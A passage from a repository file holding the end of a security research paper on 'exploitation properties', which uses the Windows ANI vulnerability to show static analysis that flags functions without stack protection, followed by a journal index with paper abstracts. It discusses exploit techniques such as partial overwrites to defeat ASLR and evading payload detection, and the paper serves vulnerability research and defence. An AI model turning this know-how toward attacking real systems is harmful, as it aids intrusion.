that they are less likely to contain exploitable vulnerabilities.
A second property that the ANI vulnerability had with regard to exploitation
was that it was possible for an attacker to make use of a partial overwrite to
defeat ASLR. The exploitation property described in 2.4.2 illustrates how one can
make this determination statically. In the case of the ANI vulnerability, a
partial overwrite can be performed by making use of a jmp [ebx] that is
located within the same 16-page aligned region as the caller of LoadAniIcon.
Thus, any functions that could potentially make use of a partial overwrite can
be used as additional criteria.
At this point, a subset can be produced that is constrained to the regions of
code that are annotated with the GS and partial overwrite exploitation
properties. It is possible to further refine the set of functions that should
ultimately be considered by studying the form that the ANI vulnerability took.
The first point to note is that the stack-based buffer overflow occurred when
writing beyond the bounds of a struct that was allocated on the stack.
Furthermore, the overflow did not actually occur in the immediate context of
the LoadAniIcon itself. Instead, the overflow was triggered by passing a
pointer to the stack-allocated struct as a parameter when calling the function
ReadChunk.
Based on these data points it is possible to define a third criteria. In this
case, the third criteria is not an exploitation property but is instead an
example of a vulnerability property. While not discussed in detail in this
paper, many examples of vulnerability properties exist, though perhaps not
categorized as such. A vulnerability property can be thought of as an
annotation that illustrates whether or not a region of code has a form that is
similar to that seen in vulnerabilities or has the potential of being a
vulnerability. The complexity of a vulnerability property, as with the
complexity of an exploitation property, can range from highly sophisticated to
very simplistic.
For the purpose of this paper, a vulnerability property can be used that is
very simple and imprecise but nevertheless effective at further narrowing the
set of functions that should be reviewed. This property is based on whether
or not a function passes a pointer to a stack-allocated variable as a
parameter to a child function. This property is directly derived from the
general form that the ANI vulnerability takes. At a minimum, a region of code
that matches this form suggests that a vulnerability could be present.
Using these three properties, it should be possible to easily identify both
the function that contains the ANI vulnerability as well as other functions
that could contain similar vulnerabilities. However, it is important to note
that this process does not produce functions that definitely have
vulnerabilities. This can be plainly seen by the fact that both the
vulnerable and fixed versions of the LoadAniIcon should be detected by the
criteria described above. While this may seem to run counter to the purposes
of this paper, it is important for the reader to remember that the goal of
using these exploitation properties is not to identify specific instances of
vulnerabilities. Instead, the goal is to identify regions of code that might
warrant additional scrutiny due to the relative ease with which a
vulnerability could be exploited if one is found to be present.
3.3) Test Case
The author developed an analysis tool as an extension to Microsoft's Phoenix
framework in order to test the ideas described in this paper[12]. Unfortunately,
the current release (July 2007 SDK) of Phoenix requires private symbol
information for native binaries. This limitation prevented the author from
being able to run the analysis tool across the vulnerable version of
user32.dll. In lieu of this ability, the author chose to generate a binary
containing test cases that closely mirror the form of the function containing
the ANI vulnerability.
Using these test cases, the author used the features provided by the analysis
tool to determine the exploitation and vulnerability properties described in
the previous section and to identify the resulting subset of functions meeting
all criteria. This was accomplished by first attempting to identify the
subset of functions that do not contain GS within the scope of the target
binary. After identifying the subset of functions without GS, a second subset
was taken which consists of the functions that pass a pointer to a
stack-allocated local variable as a parameter to a child routine. This was
accomplished by using Phoenix's static single assignment (SSA) and alias
implementations to collect the requisite data flow information[12,25]. Using this
data flow information, it is possible to perform backwards data flow analysis
to determine the potential storage location of the parameter being passed at
each point along a given data flow path starting from the operand associated
with a parameter at a call site. The analysis terminates either when a fixed
point is reached or when it is determined that a pointer to a stack-allocated
variable could be passed as the parameter.
While the previous section described the potential for using the partial
overwrite exploitation property to detect the function containing the ANI
vulnerability[6], it is not possible to create a meaningful parallel between the
test binary and that of the ANI vulnerability. This is due in part to the
fact that while it would certainly be possible to artificially place a useful
opcode at a specific location in the test binary, it would not add any value
beyond showing that it is possible to detect useful opcodes within the same
16-page aligned region as the caller of a given function. The author feels
that this point is somewhat moot given the fact that it has already been
proven that a partial overwrite can be used with the ANI vulnerability. The
only additional benefit that it could offer in this case would be to help
further constrain the resultant set size. However, without being able to run
this analysis against the vulnerable version of user32.dll, it is not possible
to draw meaningful conclusions at this point in time.
3.4) Results
The results of running the analysis tool against the test binary produced the
expected behavior. To illustrate this, it is helpful to consider a sampling
of the functions that were analyzed. The following functions have a form that
is similar to the ANI vulnerability. These functions also match the criteria
described in the previous subsection. Specifically, these functions do not
make use of GS and pass a pointer to a stack-allocated local variable (var) to
a child function:
int tc_df_pass_local_ptr_to_callee() {
int var;
tc_df_pass_local_ptr_to_callee_func(&var);
return 0;
}
int tc_df_pass_local_ptr_to_callee_alias() {
int var;
int *p = &var;
tc_df_pass_local_ptr_to_callee_func(p);
return 0;
}
int tc_df_pass_local_ptr_to_callee_alias_struct(
struct _foo *foo) {
int var;
foo->ptr = &var;
return tc_df_pass_local_ptr_to_callee_func(
foo->ptr);
return 0;
}
Additionally, a handful of different test functions were also included in the
target binary in an effort to ensure that other scenarios were not improperly
detected as matching the criteria. Some examples of these functions include:
int tc_df_pass_local_to_callee_alias() {
int var = 2;
int p = var;
tc_df_pass_local_to_callee_func(p);
return 0;
}
int tc_df_pass_local_to_callee_deref() {
int var = 2;
int *p = &var;
tc_df_pass_local_to_callee_func(*p);
return 0;
}
int tc_df_pass_heap_ptr_to_callee(struct _foo *foo) {
tc_df_pass_local_ptr_to_callee_func(&foo->val);
return 0;
}
When running the analysis tool against the target binary, the following output
is shown:
>PhaseRunner.exe detectani.xml dfa.exe
Running phase: ANI Detection ... 1 target(s)
Displaying 3 normalizables at the
ProgramElement.Method granularity...
00001: dfa!tc_df_pass_local_ptr_to_callee_alias
00002: dfa!tc_df_pass_local_ptr_to_callee
00003: dfa!tc_df_pass_local_ptr_to_callee_alias_struct
While this unfortunately does not prove that these techniques could be used to
identify the function containing the ANI vulnerability, it does nevertheless
hint at the potential for detecting the function containing the ANI
vulnerability using its suggested exploitation and vulnerability properties.
As an side, another interesting way in which this type of detection can be
accomplished is through the use of Language Integrated Queries (LINQ) which
are now supported in Visual Studio 2008[11]. For instance, a simple LINQ
expression for the above narrowing operation can be expressed as:
var matches =
from
Method method in engine.GetScopeMethods()
where
!method.IsGuardStackEnabled() &&
method.IsPassingStackLocalPtrToChild()
select method;
foreach (var method in matches)
Console.WriteLine("{0} matches", method);
4) Potential Uses
Program analysis is one area that may benefit from the use of exploitation
properties. In particular, an auditor can make use of exploitation properties
to assist in the process of identifying regions of code that should be audited
more closely or with greater precedence. This determination can be made by
using exploitation properties to understand the ease of exploitation
associated with specific binaries or functions. By combining this information
with other data that is collected either manually or automatically, an auditor
can get a better understanding of the security aspects that are associated
with a system. This is beneficial both to an attacker and a defender. An
attacker can identify regions of code that would be easier to exploit and thus
devote more time to auditing those regions. Likewise, a defender can use this
information to the same extent but for different purposes. This type of
information is especially useful to a defender who needs to balance the cost
associated with performing security reviews because it should offer a better
understanding of what the business cost might be if a vulnerability is found
in a region of code. This cost can be derived from the negative publicity and
response effort needed to cope with a flaw that is found publicly in a region
of code that is widely exploited. For example, consider some of the Windows
flaws that have lead to wormable issues and the cost they have had relative to
other issues.
Exploitation properties may also benefit the security community by helping to
identify ways in which future mitigations can be applied. This would involve
analyzing regions of code that could be more easily exploited in an effort to
determine what other forms of mitigations could help to protect these regions,
if any. This information could be fed back to the compiler to make it
possible for mitigations to be enabled that might otherwise be disabled by
default. For example, a function that by default would not have GS but is
subsequently found to be highly exploitable may benefit from having the
compiler insert GS.
5) Future Work
While this paper has defined exploitation properties and described a handful
of concrete examples, it has not attempted to formally define the correlation
between exploitation properties and the exploitation techniques they are
associated with. Future research will attempt to concretely define this
relationship as it should lead to a better understanding of the variables that
permit the use of various exploitation techniques. Using more formal
definitions of exploitation properties, a larger scale case study can be
completed which collects data about the effect of using exploitation
properties to improve program understanding for a variety of purposes. The
author views exploitation properties as being one component in a larger model.
This larger model could be used to join major areas of study within computer
security including attack surface analysis, vulnerability analysis, and
exploitation analysis to form a more complete understanding of the true risks
associated with a system.
6) Conclusion
This paper has introduced the general concept of exploitation properties and
described how they can be used to better understand the exploitability of a
system. The purpose of an exploitation property is to help convey the ease
with which a vulnerability might be exploited if one is found to be present.
Exploitation properties can be broken down into different categories based on
the configuration or context that a given property is associated from. These
categories include operating platforms, running processes, binary modules, and
functions.
Exploitation properties can be used to provide an alternative understanding of
an application's attack surface from the perspective of which areas would be
most trivially exploited. This can allow an attacker to focus on finding
security issues in code that would be more easily exploited. Likewise, a
defender can draw the same conclusions and direct resources of their own at
reviewing the associated code. It may also be possible to use this
information to augment existing mitigations or to come up with new
mitigations. A contrived example based on the form of the ANI vulnerability
was used to illustrate an automated approach to extracting exploitation
properties and using them to help identify a constrained subset of regions of
code that meet a specific criteria. Future research will attempt to better
define the extent of exploitation properties and their uses.
[1] Dowd, M., Metha, N., McDonald, J. Breaking C++ Applications.
https://www.blackhat.com/presentations/bh-usa-07/Dowd_McDonald_and_Mehta/Whitepaper/bh-usa-07-dowd_mcdonald_and_mehta.pdf
[2] Durden, Tyler. Bypassing PaX ASLR Protection. July, 2002.
http://www.phrack.org/issues.html?issue=59&id=9
[3] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!).
http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx
[4] Johnson, Richard. Windows Vista: Exploitation Countermeasures.
http://rjohnson.uninformed.org/
[5] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention
Mechanism of Microsoft Windows 2003 Server.
http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf
[6] Metasploit. Exploiting the ANI vulnerability on Vista.
http://blog.metasploit.com/2007/04/exploiting-ani-vulnerability-on-vista.html
[7] Microsoft Corporation. Microsoft Security Bulletin MS05-002. Jan, 2005.
http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
[8] Microsoft Corporation. /GS (Buffer Security Check).
http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx
[9] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers).
http://msdn2.microsoft.com/en-us/library/9a89h429.aspx
[10] Microsoft Corporation. A detailed description of the Data Execution
Prevention (DEP) feature. http://support.microsoft.com/kb/875352
[11] Microsoft Corporation. The LINQ Project.
http://msdn2.microsoft.com/en-us/netframework/aa904594.aspx
[12] Microsoft Corporation. Phoenix. http://research.microsoft.com/phoenix/
[13] Microsoft Corporation. Microsoft Portable Executable and Object File
Format Specification.
http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/pecoff_v8.doc
[14] Microsoft Corporation. Threat Modeling. June, 2003.
http://msdn2.microsoft.com/en-us/library/aa302419.aspx
[15] PaX Team. ASLR. http://pax.grsecurity.net/docs/aslr.txt
[16] Ren, Chris et al. Microsoft Compiler Flaw Technical Note.
http://www.cigital.com/news/index.php?pg=art&artid=70
[17] Rahbar, Ali. An analysis of Microsoft Windows Vista's ASLR. Oct, 2006.
http://www.sysdream.com/articles/Analysis-of-Microsoft-Windows-Vista's-ASLR.pdf
[18] skape, Skywing. Bypassing Windows Hardware-enforced DEP.
http://www.uninformed.org/?v=2&a=4&t=sumry
[19] skape. Preventing the Exploitation of SEH Overwrites.
http://www.uninformed.org/?v=5&a=2&t=sumry
[20] skape. Reducing the Effective Entropy of GS Cookies.
http://www.uninformed.org/?v=7&a=2&t=sumry
[21] Skywing. Vista ASLR is not on by default for image base addresses.
http://www.nynaeve.net/?p=100
[22] Sotirov, Alexander. Windows Animated Cursor Stack Overflow
Vulnerability. March, 2007.
http://www.determina.com/security.research/vulnerabilities/ani-header.html
[23] Wikipedia. Stack-smashing protection.
http://en.wikipedia.org/wiki/Stack-smashing_protection
[24] Wikipedia. Address space layout randomization.
http://en.wikipedia.org/wiki/ASLR
[25] Wikipedia. Static single assignment form.
http://en.wikipedia.org/wiki/Static_single_assignment_form
[26] University of Wisconsin. Wisconsin Program-Slicing Project's Home Page.
http://www.cs.wisc.edu/wpis/html/
[27] Whitehouse, Ollie. Analysis of GS protections in Microsoft Windows
Vista. http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf

22
uninformed/9.txt Normal file
View File

@ -0,0 +1,22 @@
Engineering in Reverse
An Objective Analysis of the Lockdown Protection System for Battle.net
Skywing
Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.
html | pdf | txt
Exploitation Technology
ActiveX - Active Exploitation
warlord
This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.
html | pdf | txt
Context-keyed Payload Encoding
I)ruid
A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.
html | pdf | txt
Improving Software Security Analysis using Exploitation Properties
skape
Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.
html | pdf | txt

BIN
uninformed/code.1.1.tgz Normal file

Binary file not shown.

BIN
uninformed/code.1.4.tgz Normal file

Binary file not shown.

BIN
uninformed/code.2.2.tgz Normal file

Binary file not shown.

BIN
uninformed/code.3.3.tgz Normal file

Binary file not shown.

BIN
uninformed/code.3.6.tgz Normal file

Binary file not shown.

BIN
uninformed/code.4.4.tgz Normal file

Binary file not shown.

BIN
uninformed/code.6.1.tgz Normal file

Binary file not shown.

BIN
uninformed/code.6.2.tgz Normal file

Binary file not shown.

BIN
uninformed/code.6.3.tgz Normal file

Binary file not shown.

BIN
uninformed/code.7.1.tgz Normal file

Binary file not shown.

BIN
uninformed/code.7.2.tgz Normal file

Binary file not shown.

BIN
uninformed/code.8.1.tgz Normal file

Binary file not shown.

BIN
uninformed/code.8.2.tgz Normal file

Binary file not shown.

BIN
uninformed/code.8.3.tgz Normal file

Binary file not shown.

BIN
uninformed/code.8.4.zip Normal file

Binary file not shown.

BIN
uninformed/code.8.6.tgz Normal file

Binary file not shown.